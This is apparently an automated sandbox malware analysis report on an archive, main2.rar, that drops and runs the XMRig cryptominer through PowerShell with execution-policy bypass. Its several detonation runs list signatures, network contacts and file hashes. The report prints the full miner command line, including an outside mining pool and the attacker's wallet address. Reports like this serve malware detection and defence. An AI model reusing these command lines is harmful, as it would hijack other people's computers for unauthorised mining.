Malware Analysis Report

2025-04-19 18:41

Sample ID 240527-ar54aaae69
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags: xmrig, execution, miner
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Behavioral analyses, each with Detonation Overview, Command Line, Signatures, Processes, Network and Files, in page order: behavioral2, behavioral19, behavioral20, behavioral25, behavioral3, behavioral4, behavioral7, behavioral16, behavioral21, behavioral5, behavioral8, behavioral9, behavioral12, behavioral15, behavioral23, behavioral6, behavioral22, behavioral32, behavioral11, behavioral17, behavioral18, behavioral24, behavioral28, behavioral29, behavioral14, behavioral30, behavioral26, behavioral27, behavioral10, behavioral13, behavioral1, behavioral31

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:44

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows in the original table; no description, indicator, process or target was recorded for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/2272-3-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp

memory/2272-5-0x00000198B7E80000-0x00000198B7EA2000-memory.dmp

memory/2272-6-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-10-0x00000198D0680000-0x00000198D06F6000-memory.dmp

memory/2272-9-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p0xjhot1.x2b.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2272-26-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-49-0x00000198D04A0000-0x00000198D04B2000-memory.dmp

memory/2272-62-0x00000198D0490000-0x00000198D049A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2220-91-0x000001F9EBAE0000-0x000001F9EBB00000-memory.dmp

memory/2220-92-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2272-93-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2272-95-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp

memory/2220-94-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2272-96-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp

memory/2220-97-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-98-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-99-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-100-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-101-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-102-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-103-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-104-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-105-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-106-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-107-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-108-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-109-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-110-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-111-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-112-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-113-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-114-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-115-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-116-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-117-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-118-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-119-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-120-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-121-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-122-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-123-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-124-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-125-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-126-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-127-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-128-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-129-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-130-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-131-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-132-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-133-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-134-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-135-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-136-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-137-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-138-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-139-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-140-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-141-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-142-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-143-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-144-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-145-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-146-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-147-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-148-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-149-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-150-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-151-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-152-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-153-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-154-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-155-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-156-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

memory/2220-157-0x00007FF6ECDC0000-0x00007FF6ED9F3000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:05

Platform

win10v2004-20240226-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows in the original table; no description, indicator, process or target was recorded for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3692 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 216.58.214.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.214.58.216.in-addr.arpa udp

Files

memory/4336-0-0x00007FFED7BA3000-0x00007FFED7BA5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vvqbeawo.zed.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4336-10-0x0000024AEA140000-0x0000024AEA162000-memory.dmp

memory/4336-11-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/4336-12-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/4336-13-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/4336-15-0x0000024AEC690000-0x0000024AEC6A2000-memory.dmp

memory/4336-16-0x0000024AEA170000-0x0000024AEA17A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2384-47-0x000001D82A290000-0x000001D82A2B0000-memory.dmp

memory/4336-48-0x00007FFED7BA3000-0x00007FFED7BA5000-memory.dmp

memory/4336-49-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/2384-51-0x000001D82A2E0000-0x000001D82A300000-memory.dmp

memory/4336-50-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/4336-52-0x00007FFED7BA0000-0x00007FFED8661000-memory.dmp

memory/2384-53-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-54-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-55-0x000001D82A300000-0x000001D82A320000-memory.dmp

memory/2384-56-0x000001D82A320000-0x000001D82A340000-memory.dmp

memory/2384-57-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-58-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-60-0x000001D82A320000-0x000001D82A340000-memory.dmp

memory/2384-59-0x000001D82A300000-0x000001D82A320000-memory.dmp

memory/2384-61-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-62-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-63-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-64-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-65-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-66-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-67-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-68-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-69-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-70-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-71-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-72-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-73-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-74-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-75-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-76-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-77-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-78-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-79-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-80-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-81-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-82-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-83-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-84-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-85-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-86-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-87-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-88-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-89-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-90-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-91-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-92-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-93-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-94-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-95-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-96-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-97-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-98-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-99-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-100-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-101-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-102-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-103-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-104-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-105-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-106-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-107-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-108-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-109-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-110-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-111-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-112-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-113-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-114-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-115-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-116-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-117-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-118-0x00007FF665B00000-0x00007FF666733000-memory.dmp

memory/2384-119-0x00007FF665B00000-0x00007FF666733000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:05

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows in the original table; no description, indicator, process or target was recorded for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.48:443 tcp

Files

memory/4876-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/4876-9-0x0000023DCE940000-0x0000023DCE962000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4x1s0em.hcn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4876-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-14-0x0000023DCE9F0000-0x0000023DCEA02000-memory.dmp

memory/4876-15-0x0000023DCE980000-0x0000023DCE98A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2312-46-0x0000022742C70000-0x0000022742C90000-memory.dmp

memory/2312-47-0x00000227D6950000-0x00000227D6970000-memory.dmp

memory/2312-48-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/4876-49-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/4876-50-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/2312-51-0x00000227D6DA0000-0x00000227D6DC0000-memory.dmp

memory/2312-52-0x00000227D6FD0000-0x00000227D6FF0000-memory.dmp

memory/2312-53-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-54-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-55-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-57-0x00000227D6FD0000-0x00000227D6FF0000-memory.dmp

memory/2312-56-0x00000227D6DA0000-0x00000227D6DC0000-memory.dmp

memory/2312-58-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-59-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp

memory/2312-60-0x00007FF784B70000-0x00007FF7857A3000-memory.dmp


Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:08

Platform

win7-20240508-en

Max time kernel

1563s

Max time network

1564s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Network

N/A

Files

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:44

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1757s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

